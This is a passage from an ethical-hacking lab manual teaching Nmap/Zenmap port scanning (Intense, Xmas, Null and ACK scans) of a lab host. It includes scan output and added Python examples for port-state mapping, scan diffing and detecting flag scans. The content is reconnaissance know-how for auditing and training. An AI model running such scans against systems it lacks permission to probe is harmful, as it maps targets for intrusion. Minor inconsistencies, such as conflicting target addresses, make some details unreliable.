2. Evaluate under what circumstances GFI LANguard displays a dialog during patch deployment.
3. Can you change the message displayed when GFI LANguard is performing administrative tasks? If yes, how?

Internet Connection Required
□ Yes  ☑ No

Platform Supported
☑ Classroom  ☑ iLabs
Exploring and Auditing a Network Using Nmap

Nmap (Zenmap is the official Nmap GUI) is a free, open source (license) utility for network exploration and security auditing.

Lab Scenario

In the previous lab you learned to use GFI LanGuard 2012 to scan a network to find out the vulnerability level, system patching status, details for open and closed ports, vulnerable computers, etc. An administrator and an attacker can use the same tools to fix or exploit a system. If an attacker learns all the information about vulnerable computers, they will immediately act to compromise those systems using reconnaissance techniques. Therefore, as an administrator it is very important for you to patch those systems after you have determined all the vulnerabilities in a network, before the attacker audits the network to gain vulnerable information. Also, as an ethical hacker and network administrator for your company, your job is to carry out daily security tasks, such as network inventory, service upgrade schedules, and the monitoring of host or service uptime. So, you will be guided in this lab to use Nmap to explore and audit a network.

Lab Objectives

The objective of this lab is to help students learn and understand how to perform a network inventory, manage services and upgrades, schedule network tasks, and monitor host or service uptime and downtime.

In this lab, you need to:
■ Scan TCP and UDP ports
■ Analyze host details and their topology
■ Determine the types of packet filters
■ Record and save all scan reports
■ Compare saved results for suspicious ports

Lab Environment

To perform the lab, you need:
■ Nmap located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\Nmap
■ You can also download the latest version of Nmap from http://nmap.org/
■ If you decide to download the latest version, the screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as a host machine
■ Windows Server 2008 running on a virtual machine as a guest
■ A web browser with Internet access
■ Administrative privileges to run the Nmap tool

Lab Duration
Time: 20 Minutes

Overview of Network Scanning

Network addresses are scanned to determine:
■ What services (application names and versions) those hosts offer
■ What operating systems (and OS versions) they run
■ The type of packet filters/firewalls that are in use, and dozens of other characteristics

Zenmap works on Windows, including Windows 7, and Server 2003/2008.

Lab Tasks

Follow the wizard-driven installation steps and install the Nmap (Zenmap) scanner on the host machine (Windows Server 2012).

TASK 1: Intense Scan

1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

FIGURE 6.1: Windows Server 2012 - Desktop view
2. Click the Nmap - Zenmap GUI app to open the Zenmap window.

The Zenmap installer installs the following files:
■ Nmap Core Files
■ Nmap Path
■ WinPcap 4.1.1
■ Network Interface Import
■ Zenmap (GUI frontend)
■ Ncat (Modern Netcat)
■ Ndiff

FIGURE 6.2: Windows Server 2012 - Apps

3. The Nmap - Zenmap GUI window appears.

Nmap syntax: nmap [Scan Type(s)] [Options] {target specification}

FIGURE 6.3: The Zenmap main window

4. Enter the IP address of the Windows Server 2008 virtual machine (10.0.0.4) in the Target: text field.

5. You are performing a network inventory for the virtual machine. In this lab, the IP address is 10.0.0.4; it will be different in your lab environment.

6. In the Profile: field, select from the drop-down list the type of profile you want to scan with. In this lab, select Intense Scan.

In port scan techniques, only one method may be used at a time, except that a UDP scan (-sU) and any one of the SCTP scan types (-sY, -sZ) may be combined with any one of the TCP scan types.
7. Click Scan to start scanning the virtual machine.

FIGURE 6.4: The Zenmap main window with Target and Profile entered

8. Nmap scans the provided IP address with the Intense scan profile (command: nmap -T4 -A -v 10.0.0.4) and displays the scan result below the Nmap Output tab:

    Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24
    NSE: Loaded 93 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating ARP Ping Scan at 15:35
    Scanning 10.0.0.4 [1 port]
    Completed ARP Ping Scan at 15:35, 0.17s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 15:35
    Completed Parallel DNS resolution of 1 host. at 15:35, 0.50s elapsed
    Initiating SYN Stealth Scan at 15:35
    Scanning 10.0.0.4 [1000 ports]
    Discovered open port 135/tcp on 10.0.0.4
    Discovered open port 139/tcp on 10.0.0.4
    Discovered open port 445/tcp on 10.0.0.4
    Increasing send delay for 10.0.0.4 from 0 to 5 due to 72 out of 179 dropped probes since last increase.
    Discovered open port 49152/tcp on 10.0.0.4
    Discovered open port 49154/tcp on 10.0.0.4
    Discovered open port 49153/tcp on 10.0.0.4
    Discovered open port 49156/tcp on 10.0.0.4
    Discovered open port 49155/tcp on 10.0.0.4
    Discovered open port 5357/tcp on 10.0.0.4

FIGURE 6.5: The Zenmap main window with the Nmap Output tab for Intense Scan

9. After the scan is complete, Nmap shows the scanned results.

While Nmap attempts to produce accurate results, keep in mind that all of its insights are based on packets returned by the target machines or the firewalls in front of them.

The six port states recognized by Nmap:
■ Open
■ Closed
■ Filtered
■ Unfiltered
■ Open|Filtered
■ Closed|Unfiltered

Nmap accepts multiple host specifications on the command line, and they don't need to be of the same type.
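To make the six port states concrete, here is an added Python example (not from the lab manual and not code from the Nmap project) that encodes how Nmap turns the reply to a probe into a port state for SYN, ACK and FIN/NULL/Xmas scans, following Nmap's documented behaviour, and then groups a set of replies the way the Host Details tab counts open, closed and filtered ports. The port numbers and replies in SYN_REPLIES and XMAS_REPLIES are constructed for the example; they describe one host behind a stateful firewall that permits 135, 139 and 445, refuses 5357 and silently drops the rest.

```python
"""Map probe replies to Nmap's port states (added example; not from the lab
manual or from the Nmap project). Rules follow Nmap's documented behaviour."""

from collections import defaultdict
from typing import Dict, List, Optional

# Reply kinds a single probe can elicit (constructed labels).
SYN_ACK = "syn-ack"                    # handshake accepted
RST = "rst"                            # actively refused
ICMP_UNREACHABLE = "icmp-unreachable"  # e.g. type 3, code 1/2/3/9/10/13
NO_REPLY = None                        # silence, even after retransmission


def port_state(scan_type: str, reply: Optional[str]) -> str:
    """Return the Nmap port state for one probe of the given scan type.

    Nmap can only reason from the packets that come back. For the stealth
    scans (FIN/NULL/Xmas) silence is ambiguous: an RFC 793 stack stays silent
    on an open port, but a firewall dropping the probe looks identical, hence
    the combined open|filtered state.
    """
    if scan_type in ("syn", "connect"):        # -sS / -sT
        if reply == SYN_ACK:
            return "open"
        if reply == RST:
            return "closed"
        return "filtered"                      # dropped or ICMP error
    if scan_type in ("fin", "null", "xmas"):   # -sF / -sN / -sX
        if reply == RST:
            return "closed"
        if reply == ICMP_UNREACHABLE:
            return "filtered"
        return "open|filtered"
    if scan_type == "ack":                     # -sA maps firewall rules only
        if reply == RST:
            return "unfiltered"                # reachable; open/closed unknown
        return "filtered"
    raise ValueError(f"unsupported scan type: {scan_type}")


def summarize(scan_type: str, replies: Dict[int, Optional[str]]) -> Dict[str, List[int]]:
    """Group probed ports by the state Nmap would report for them."""
    by_state: Dict[str, List[int]] = defaultdict(list)
    for port in sorted(replies):
        by_state[port_state(scan_type, replies[port])].append(port)
    return dict(by_state)


# Constructed replies to a SYN scan of the firewalled host described above.
SYN_REPLIES: Dict[int, Optional[str]] = {
    135: SYN_ACK, 139: SYN_ACK, 445: SYN_ACK, 5357: RST,
    80: NO_REPLY, 443: NO_REPLY, 3389: NO_REPLY,
}

# Constructed replies to a Xmas scan of the same host: an RFC 793 stack stays
# silent on open ports, so they are indistinguishable from dropped probes.
XMAS_REPLIES: Dict[int, Optional[str]] = {
    135: NO_REPLY, 139: NO_REPLY, 445: NO_REPLY, 5357: RST,
    80: NO_REPLY, 443: NO_REPLY, 3389: NO_REPLY,
}

if __name__ == "__main__":
    print("SYN  :", summarize("syn", SYN_REPLIES))
    print("Xmas :", summarize("xmas", XMAS_REPLIES))
```

Running it shows why the Xmas scan in Task 2 reports far less than the Intense scan: the SYN scan separates open, closed and filtered ports, while the Xmas scan can only say closed or open|filtered. Note also that Windows stacks reply with a RST to FIN/NULL/Xmas probes regardless of port state, so against the Windows Server 2008 target every port would be reported closed; that is a limitation of the probe, not evidence that the services are gone.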
Further down in the Nmap Output, the port table and OS detection results read:

    139/tcp   open  netbios-ssn
    445/tcp   open  netbios-ssn
    5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-methods: No Allow or Public header in OPTIONS response (status code 503)
    |_http-title: Service Unavailable
    49152/tcp open  msrpc        Microsoft Windows RPC
    49153/tcp open  msrpc        Microsoft Windows RPC
    49154/tcp open  msrpc        Microsoft Windows RPC
    49155/tcp open  msrpc        Microsoft Windows RPC
    49156/tcp open  msrpc        Microsoft Windows RPC
    MAC Address: 00:15:5D:00:07:10 (Microsoft)
    Device type: general purpose
    Running: Microsoft Windows 7|2008
    OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008::sp1
    OS details: Microsoft Windows 7 or Windows Server 2008 SP1
    Uptime guess: 0.256 days (since Fri Aug 24 09:27:40 2012)
    Network Distance: 1 hop
    TCP Sequence Prediction: Difficulty=263 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

FIGURE 6.6: The Zenmap main window with the Nmap Output tab for Intense Scan

10. Click the Ports/Hosts tab to display more information on the scan results.

11. Nmap also displays the Port, Protocol, State, Service, and Version for each result of the scan.
The options available to control target selection:
■ -iL <inputfilename>
■ -iR <num hosts>
■ --exclude <host1>[,<host2>[,...]]
■ --excludefile <exclude file>

The following options control host discovery:
■ -sL (List Scan)
■ -sn (No port scan)
■ -Pn (No ping)
■ -PS <port list> (TCP SYN Ping)
■ -PA <port list> (TCP ACK Ping)
■ -PU <port list> (UDP Ping)
■ -PY <port list> (SCTP INIT Ping)
■ -PE; -PP; -PM (ICMP Ping Types)
■ -PO <protocol list> (IP Protocol Ping)
■ -PR (ARP Ping)
■ --traceroute (Trace path to host)
■ -n (No DNS resolution)
■ -R (DNS resolution for all targets)
■ --system-dns (Use system DNS resolver)
■ --dns-servers <server1>[,<server2>[,...]] (Servers to use for reverse DNS queries)

FIGURE 6.7: The Zenmap main window with the Ports/Hosts tab for Intense Scan (135, 139, 445, 5357 and 49152-49156/tcp open; services msrpc, netbios-ssn and http)
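The lab objectives ask you to record and save scan reports and to compare saved results for suspicious ports. The following added Python example (not from the lab manual and not code from the Nmap project) parses the PORT/STATE/SERVICE/VERSION table and the verbose "Discovered open port" lines that appear under Nmap Output, and diffs a baseline scan against a later one. Both scan texts are constructed for the example: the baseline is modelled on the Intense scan output shown above, and the later scan invents a newly opened 3389/tcp and a missing 5357/tcp so that the diff has something to report.

```python
"""Parse saved Nmap normal output and diff two scans for port changes.
Added example; not part of the lab manual or of Nmap."""

import re
from typing import Dict, List, Tuple

PortKey = Tuple[int, str]  # (port number, protocol)

# One row of the PORT/STATE/SERVICE/VERSION table, e.g.
# "5357/tcp  open  http  Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)"
TABLE_ROW = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp|sctp)\s+(?P<state>[\w|]+)\s+"
    r"(?P<service>\S+)(?:\s+(?P<version>.*))?$"
)
# Verbose progress line printed before the table (-v), e.g.
# "Discovered open port 445/tcp on 10.0.0.4"
DISCOVERED = re.compile(
    r"^Discovered open port (?P<port>\d+)/(?P<proto>tcp|udp|sctp) on \S+$"
)


def parse_ports(output: str) -> Dict[PortKey, dict]:
    """Return {(port, proto): {state, service, version}} from an Nmap report.

    Header lines, NSE script output (lines starting with '|') and the OS
    fingerprint section match neither pattern and are skipped. A table row
    for a port overrides the bare "Discovered" entry for the same port.
    """
    ports: Dict[PortKey, dict] = {}
    for raw in output.splitlines():
        line = raw.strip()
        m = DISCOVERED.match(line)
        if m:
            key = (int(m["port"]), m["proto"])
            ports.setdefault(key, {"state": "open", "service": "", "version": ""})
            continue
        m = TABLE_ROW.match(line)
        if m:
            ports[(int(m["port"]), m["proto"])] = {
                "state": m["state"],
                "service": m["service"],
                "version": (m["version"] or "").strip(),
            }
    return ports


def diff_scans(baseline: Dict[PortKey, dict],
               current: Dict[PortKey, dict]) -> Dict[str, List[PortKey]]:
    """Report ports that opened, stopped being open, or changed service/version."""
    base_open = {k for k, v in baseline.items() if v["state"] == "open"}
    cur_open = {k for k, v in current.items() if v["state"] == "open"}
    changed = [
        k for k in sorted(base_open & cur_open)
        if (baseline[k]["service"], baseline[k]["version"])
        != (current[k]["service"], current[k]["version"])
    ]
    return {
        "new_open": sorted(cur_open - base_open),
        "no_longer_open": sorted(base_open - cur_open),
        "changed": changed,
    }


# Constructed baseline, modelled on the Intense scan output shown in the lab.
BASELINE_SCAN = """\
Discovered open port 135/tcp on 10.0.0.4
Discovered open port 445/tcp on 10.0.0.4
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  netbios-ssn
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
49152/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:15:5D:00:07:10 (Microsoft)
"""

# Constructed later scan: 3389/tcp has appeared and 5357/tcp is gone.
LATER_SCAN = """\
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  netbios-ssn
3389/tcp  open  ms-wbt-server  Microsoft Terminal Service
49152/tcp open  msrpc          Microsoft Windows RPC
"""

if __name__ == "__main__":
    print(diff_scans(parse_ports(BASELINE_SCAN), parse_ports(LATER_SCAN)))
```

In practice you would feed the function the text saved from Zenmap's Scan menu (or nmap -oN output) for two dates; any entry under new_open is the one that deserves a ticket, because a port that was not open in the approved baseline is either a change nobody recorded or a service that should not be there. A port reported as open|filtered is deliberately not treated as open here, since the scan could not confirm it.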
12. Click the Topology tab to view Nmap's topology for the provided IP address in the Intense scan profile.

FIGURE 6.8: The Zenmap main window with the Topology tab for Intense Scan

13. Click the Host Details tab to see the details of all hosts discovered during the Intense scan profile.

FIGURE 6.9: The Zenmap main window with the Host Details tab for Intense Scan (Host Status: State up; Open ports: 9; Filtered ports: 0; Closed ports: 991; Scanned ports: 1000; Last boot: Fri Aug 24 09:27:40 2012. Addresses: IPv4 10.0.0.4; IPv6 not available; MAC 00:15:5D:00:07:10. Operating System: Microsoft Windows 7 or Windows Server 2008 SP1)

By default, Nmap performs a host discovery and then a port scan against each host it determines to be online.

By default, Nmap determines your DNS servers (for rDNS resolution) from your resolv.conf file (UNIX) or the Registry (Win32).
14. Click the Scans tab to view the scan details for the provided IP addresses.

FIGURE 6.10: The Zenmap main window with the Scans tab for Intense Scan (command: nmap -T4 -A -v 10.0.0.4, status Unsaved)

15. Now, click the Services tab located in the right pane of the window. This tab displays the list of services.

16. Click the http service to list all the HTTP hostnames/IP addresses, ports, and their states (open/closed).

FIGURE 6.11: The Zenmap main window with the Services option for Intense Scan (http: 10.0.0.4, port 5357/tcp, open, Microsoft HTTPAPI httpd 2.0)

Nmap offers options for specifying which ports are scanned and whether the scan order is randomized or sequential.

In Nmap, option -p <port ranges> means scan only specified ports.

In Nmap, option -F means fast (limited port) scan.
17. Click the msrpc service to list all the Microsoft Windows RPC ports.

FIGURE 6.12: The Zenmap main window with the msrpc service for Intense Scan (10.0.0.4: ports 135, 49152, 49153, 49154, 49155 and 49156/tcp, open, Microsoft Windows RPC)

In Nmap, option --port-ratio <ratio> (a decimal number between 0 and 1) scans all ports in the nmap-services file with a ratio greater than the one given. <ratio> must be between 0.0 and 1.1.

18. Click the netbios-ssn service to list all NetBIOS hostnames.

FIGURE 6.13: The Zenmap main window with the netbios-ssn service for Intense Scan (10.0.0.4: ports 139 and 445/tcp, open)

In Nmap, option -r means don't randomize ports.

TASK 2: Xmas Scan

19. Xmas scan sends a TCP frame to a remote device with URG, ACK, RST, SYN, and FIN flags set. FIN scans work only against an OS whose TCP/IP implementation is developed according to RFC 793. The current version of Microsoft Windows is not supported.

20. Now, to perform a Xmas scan, you need to create a new profile. Click Profile > New Profile or Command Ctrl+P.

Xmas scan (-sX) sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

The option --max-retries <numtries> specifies the maximum number of port scan probe retransmissions.

21. On the Profile tab, enter Xmas Scan in the Profile name text field.

The option --host-timeout <time> gives up on slow target hosts.

FIGURE 6.15: The Zenmap Profile Editor window with the Profile tab
22. Click the Scan tab, and select Xmas Tree scan (-sX) from the TCP scans: drop-down list.

FIGURE 6.16: The Zenmap Profile Editor window with the Scan tab (TCP scans drop-down: ACK scan (-sA), FIN scan (-sF), Maimon scan (-sM), Null scan (-sN), TCP SYN scan (-sS), TCP connect scan (-sT), Window scan (-sW), Xmas Tree scan (-sX))

23. Select None in the Non-TCP scans: drop-down list and Aggressive (-T4) in the Timing template: list, and click Save Changes.

FIGURE 6.17: The Zenmap Profile Editor window with the Scan tab (resulting command: nmap -sX -T4 -A -v 10.0.0.4)

24. Enter the IP address in the Target: field, select the Xmas Scan option from the Profile: field, and click Scan.

UDP scan is activated with the -sU option. It can be combined with a TCP scan type such as SYN scan (-sS) to check both protocols during the same run.
Nmap detects rate limiting and slows down accordingly to avoid flooding the network with useless packets that the target machine drops.

You can speed up your UDP scans by scanning more hosts in parallel, doing a quick scan of just the popular ports first, scanning from behind the firewall, and using --host-timeout to skip slow hosts.
FIGURE 6.18: The Zenmap main window with Target and Profile entered (Target: 10.0.0.4, Profile: Xmas Scan, Command: nmap -sX -T4 -A -v 10.0.0.4)

In Nmap, option -sY (SCTP INIT scan) is often referred to as half-open scanning, because you don't open a full SCTP association. You send an INIT chunk, as if you were going to open a real association, and then wait for a response.

25. Nmap scans the target IP address provided and displays results on the Nmap Output tab.

FIGURE 6.19: The Zenmap main window with the Nmap Output tab (nmap -sX -T4 -A -v 10.0.0.4: Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24; NSE loaded 93 scripts; ARP Ping Scan of 10.0.0.4 (1 port); Parallel DNS resolution of 1 host; XMAS Scan of 10.0.0.4 (1000 ports); increasing send delay for 10.0.0.4 from 0 to 5 due to 34 out of 84 dropped probes since last increase; XMAS Scan completed in 8.36s; Service scan and OS detection (try #1) against 10.0.0.4; Nmap scan report for 10.0.0.4: Host is up (0.00020s latency))

When scanning systems compliant with this RFC text, any packet not containing SYN, RST, or ACK bits results in a returned RST if the port is closed, and no response at all if the port is open.

The option -sA (TCP ACK scan) is used to map out firewall rulesets, determining whether they are stateful or not and which ports are filtered.

26. Click the Services tab located at the right side of the pane. It displays all the services of that host.
FIGURE 6.20: The Zenmap main window with the Services tab (Nmap Output for nmap -sX -T4 -A -v 10.0.0.4, as in Figure 6.19)

TASK 3: Null Scan

27. Null scan works only if the operating system's TCP/IP implementation is developed according to RFC 793. In a null scan, attackers send a TCP frame to a remote host with NO flags.

28. To perform a null scan for a target IP address, create a new profile. Click Profile > New Profile or Command Ctrl+P.

FIGURE 6.21: The Zenmap main window with the New Profile or Command option (Profile menu: New Profile or Command Ctrl+P; Edit Selected Profile Ctrl+E)

The option Null Scan (-sN) does not set any bits (TCP flag header is 0).

The option -sZ (SCTP COOKIE ECHO scan) is an advanced SCTP COOKIE ECHO scan. It takes advantage of the fact that SCTP implementations should silently drop packets containing COOKIE ECHO chunks on open ports, but send an ABORT if the port is closed.
29. On the Profile tab, input a profile name Null Scan in the Profile name text field.

The option -sI <zombie host>[:<probeport>] (idle scan) is an advanced scan method that allows for a truly blind TCP port scan of the target (meaning no packets are sent to the target from your real IP address). Instead, a unique side-channel attack exploits predictable IP fragmentation ID sequence generation on the zombie host to glean information about the open ports on the target.

FIGURE 6.22: The Zenmap Profile Editor with the Profile tab

30. Click the Scan tab in the Profile Editor window. Now select the Null scan (-sN) option from the TCP scan: drop-down list.

FIGURE 6.23: The Zenmap Profile Editor with the Scan tab

31. Select None from the Non-TCP scans: drop-down field and select Aggressive (-T4) from the Timing template: drop-down field.

32. Click Save Changes to save the newly created profile.
The option -b <FTP relay host> (FTP bounce scan) allows a user to connect to one FTP server, and then ask that files be sent to a third-party server. Such a feature is ripe for abuse on many levels, so most servers have ceased supporting it.

The option -r (Don't randomize ports): By default, Nmap randomizes the scanned port order (except that certain commonly accessible ports are moved near the beginning for efficiency reasons). This randomization is normally desirable, but you can specify -r for sequential (sorted from lowest to highest) port scanning instead.
FIGURE 6.24: The Zenmap Profile Editor with the Scan tab (TCP scan: Null scan (-sN); Non-TCP scans: None; Timing template: Aggressive (-T4))

33. In the main window of Zenmap, enter the target IP address to scan, select the Null Scan profile from the Profile drop-down list, and then click Scan.

In Nmap, option --version-all (Try every single probe) is an alias for --version-intensity 9, ensuring that every single probe is attempted against each port.

The option --top-ports <n> scans the <n> highest-ratio ports found in the nmap-services file. <n> must be 1 or greater.

FIGURE 6.25: The Zenmap main window with Target and Profile entered (Target: 10.0.0.4, Profile: Null Scan)

The option -sR (RPC scan) works in conjunction with the various port scan methods of Nmap. It takes all the TCP/UDP ports found open and floods them with SunRPC program NULL commands in an attempt to determine whether they are RPC ports, and if so, what program and version number they serve up.

34. Nmap scans the target IP address provided and displays results in the Nmap Output tab.
FIGURE 6.26: The Zenmap main window with the Nmap Output tab (nmap -sN -T4 -A -v 10.0.0.4: Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24; NSE loaded 93 scripts; ARP Ping Scan of 10.0.0.4 (1 port); Parallel DNS resolution of 1 host; NULL Scan of 10.0.0.4 (1000 ports); increasing send delay for 10.0.0.4 from 0 to 5 due to 68 out of 169 dropped probes since last increase; Service scan and OS detection (try #1) against 10.0.0.4; Nmap scan report for 10.0.0.4: Host is up (0.000068s latency))

35. Click the Host Details tab to view the details of hosts, such as Host Status, Addresses, Open Ports, and Closed Ports.

FIGURE 6.27: The Zenmap main window with the Host Details tab (host 10.0.0.4: state up; 0 open ports, 0 filtered ports, 1000 closed ports, 1000 scanned ports; uptime and last boot not available; IPv4 10.0.0.4, IPv6 not available, MAC 00:15:5D:00:07:10)

TASK 4: ACK Flag Scan

36. Attackers send an ACK probe packet with a random sequence number. No response means the port is filtered, and an RST response means the port is not filtered.

The option --version-trace (Trace version scan activity) causes Nmap to print out extensive debugging info about what version scanning is doing. It is a subset of what you get with --packet-trace.
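The Xmas, Null and ACK probes of Tasks 2 to 4, modelled in code as an added example that is not from the lab manual or from Nmap: it encodes the flag combination each scan sends, the reply an RFC 793 stack and a Windows-style stack give (which is why the Null and Xmas scans above reported all 1000 ports closed), the port state Nmap infers from that reply, and a defender-side check that flags a source sending such probes to many ports. The packet log, the source address 203.0.113.9 and the open-port set are constructed for the example.

```python
"""Added example (not from the CEH lab manual or from Nmap): models the
Xmas, Null and ACK probes of Tasks 2-4 against RFC 793 and Windows-style
stacks, maps replies to Nmap port states, and flags scan sources in a
constructed packet log."""
from collections import defaultdict

# TCP control bits, low six bits of the flags byte (RFC 793)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

PROBE_NAMES = {
    0: "null",                 # -sN: TCP flag header is 0
    FIN | PSH | URG: "xmas",   # -sX: FIN, PSH and URG set
    FIN: "fin",                # -sF
    ACK: "ack",                # -sA
    SYN: "syn",                # -sS (half-open)
}


def classify_probe(flags):
    """Name the scan type an unsolicited segment corresponds to."""
    return PROBE_NAMES.get(flags & 0x3F, "other")


def rfc793_response(flags, port_open):
    """Reply from a stack that follows RFC 793 to the letter."""
    if flags & RST:
        return None                     # RST is never answered
    if flags & ACK:
        return "RST"                    # no matching connection, open or not
    if flags & SYN:
        return "SYN/ACK" if port_open else "RST"
    # Null, FIN and Xmas probes: silence on open, RST on closed
    return None if port_open else "RST"


def windows_response(flags, port_open):
    """Microsoft stacks answer RST to every non-SYN probe, so Null and
    Xmas scans report every port closed (the caveat in steps 19 and 27)."""
    if flags & RST:
        return None
    if flags & SYN and not flags & ACK:
        return "SYN/ACK" if port_open else "RST"
    return "RST"


def nmap_state(probe, reply):
    """Port state Nmap infers from one probe/reply pair."""
    if probe in ("null", "fin", "xmas"):
        return "closed" if reply == "RST" else "open|filtered"
    if probe == "ack":
        return "unfiltered" if reply == "RST" else "filtered"
    if probe == "syn":
        return {"SYN/ACK": "open", "RST": "closed"}.get(reply, "filtered")
    return "unknown"


def scan(flags, open_ports, ports, stack=rfc793_response):
    """Run one probe type over `ports` against a simulated host."""
    probe = classify_probe(flags)
    return {p: nmap_state(probe, stack(flags, p in open_ports)) for p in ports}


def detect_flag_scans(packets, min_ports=10):
    """Flag sources that send Null/FIN/Xmas probes to many distinct ports.

    packets: iterable of (src, dst, dport, flags) for segments that belong
    to no established connection, as a firewall or sensor log would record.
    """
    seen = defaultdict(set)
    for src, dst, dport, flags in packets:
        probe = classify_probe(flags)
        if probe in ("null", "fin", "xmas"):
            seen[(src, dst, probe)].add(dport)
    return sorted((src, dst, probe, len(ports))
                  for (src, dst, probe), ports in seen.items()
                  if len(ports) >= min_ports)


if __name__ == "__main__":
    # Constructed host: 135/139/445 open, as on the lab target 10.0.0.4
    lab_open = {135, 139, 445}
    ports = [22, 80, 135, 139, 445]
    print("xmas vs RFC 793:", scan(FIN | PSH | URG, lab_open, ports))
    print("xmas vs Windows:", scan(FIN | PSH | URG, lab_open, ports, windows_response))
    print("ack  vs RFC 793:", scan(ACK, lab_open, ports))
    # Constructed log: 203.0.113.9 sweeps 20 ports with Xmas probes
    log = [("203.0.113.9", "10.0.0.4", p, FIN | PSH | URG) for p in range(1, 21)]
    log += [("10.0.0.7", "10.0.0.4", 445, SYN)]
    print("alerts:", detect_flag_scans(log))
```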
37. To perform an ACK Flag Scan for a target IP address, create a new profile. Click Profile > New Profile or Command Ctrl+P.

The --script-updatedb option updates the script database found in scripts/script.db, which is used by Nmap to determine the available default scripts and categories. It is necessary to update the database only if you have added or removed NSE scripts from the default scripts directory or if you have changed the categories of any script. This option is generally used by itself: nmap --script-updatedb.

FIGURE 6.28: The Zenmap main window with the New Profile or Command option

38. On the Profile tab, input ACK Flag Scan in the Profile name text field.

FIGURE 6.29: The Zenmap Profile Editor window with the Profile tab

39. To select the parameters for an ACK scan, click the Scan tab in the Profile Editor window, select ACK scan (-sA) from the Non-TCP scans: drop-down list, and select None for all the other fields but leave the Targets: field empty.

The options --min-parallelism <numprobes> and --max-parallelism <numprobes> (Adjust probe parallelization) control the total number of probes that may be outstanding for a host group. They are used for port scanning and host discovery. By default, Nmap calculates an ever-changing ideal parallelism based on network performance.
FIGURE 6.30: The Zenmap Profile Editor window with the Scan tab (TCP scan: ACK scan (-sA); Non-TCP scans: None)

The options --min-rtt-timeout <time>, --max-rtt-timeout <time>, and --initial-rtt-timeout <time> (Adjust probe timeouts): Nmap maintains a running timeout value for determining how long it waits for a probe response before giving up or retransmitting the probe. This is calculated based on the response times of previous probes.

40. Now click the Ping tab and check IPProto probes (-PO) to probe the IP address, and then click Save Changes.

FIGURE 6.31: The Zenmap Profile Editor window with the Ping tab (Ping options: Don't ping before scanning (-Pn), ICMP ping (-PE), ICMP timestamp request (-PP), ICMP netmask request (-PM), ACK ping (-PA), SYN ping (-PS), UDP probes (-PU), IPProto probes (-PO) checked, SCTP INIT ping probes (-PY))

The option --max-retries <numtries> (Specify the maximum number of port scan probe retransmissions): When Nmap receives no response to a port scan probe, it can mean the port is filtered. Or maybe the probe or response was simply lost on the network.

41. In the Zenmap main window, input the IP address of the target machine (in this lab: 10.0.0.3), select ACK Flag Scan from the Profile: drop-down list, and then click Scan.
The option --host-timeout <time> (Give up on slow target hosts): Some hosts simply take a long time to scan. This may be due to poorly performing or unreliable networking hardware or software, packet rate limiting, or a restrictive firewall. The slowest few percent of the scanned hosts can eat up a majority of the scan time.

42. Nmap scans the target IP address provided and displays results on the Nmap Output tab.

The options --scan-delay <time> and --max-scan-delay <time> (Adjust delay between probes): This option causes Nmap to wait at least the given amount of time between each probe it sends to a given host. This is particularly useful in the case of rate limiting.

43. To view more details regarding the hosts, click the Host Details tab.

FIGURE 6.32: The Zenmap main window with the Target and Profile entered (Target: 10.0.0.4, Profile: ACK Flag Scan, Command: nmap -sA -PO 10.0.0.4)

FIGURE 6.33: The Zenmap main window with the Nmap Output tab (nmap -sA -PO 10.0.0.4: Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 17:03 India Standard Time; Nmap scan report for 10.0.0.4; Host is up; All 1000 scanned ports on 10.0.0.4 are unfiltered; MAC Address: 00:15:5D:00:07:10 (Microsoft); Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds)
FIGURE 6.34: The Zenmap main window with the Host Details tab (host 10.0.0.4: 1000 scanned ports; uptime and last boot not available; IPv4 10.0.0.4, IPv6 not available, MAC 00:15:5D:00:07:10)

The options --min-rate <number> and --max-rate <number> (Directly control the scanning rate): Nmap's dynamic timing does a good job of finding an appropriate speed at which to scan. Sometimes, however, you may happen to know an appropriate scanning rate for a network, or you may have to guarantee that a scan finishes by a certain time.

Lab Analysis

Document all the IP addresses, open and closed ports, services, and protocols you discovered during the lab.

Tool/Utility: Nmap

Information Collected/Objectives Achieved:

Types of scan used:
■ Intense scan
■ Xmas scan
■ Null scan
■ ACK Flag scan

Intense Scan - Nmap Output:
■ ARP Ping Scan - 1 host
■ Parallel DNS resolution of 1 host
■ SYN Stealth Scan
■ Discovered open ports on 10.0.0.4: 135/tcp, 139/tcp, 445/tcp, ...
■ MAC Address
■ Operating System Details
■ Uptime Guess
■ Network Distance
■ TCP Sequence Prediction
■ IP ID Sequence Generation
■ Service Info
YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Analyze and evaluate the results by scanning a target network using:
   a. Stealth Scan (Half-open Scan)
   b. nmap -P

2. Perform Inverse TCP Flag Scanning and analyze hosts and services for a target machine in the network.

Internet Connection Required
□ Yes ☑ No

Platform Supported
☑ Classroom ☑ iLabs
Scanning a Network Using the NetScan Tools Pro

NetScanTools Pro is an integrated collection of internet information gathering and network troubleshooting utilities for Network Professionals.

Lab Scenario

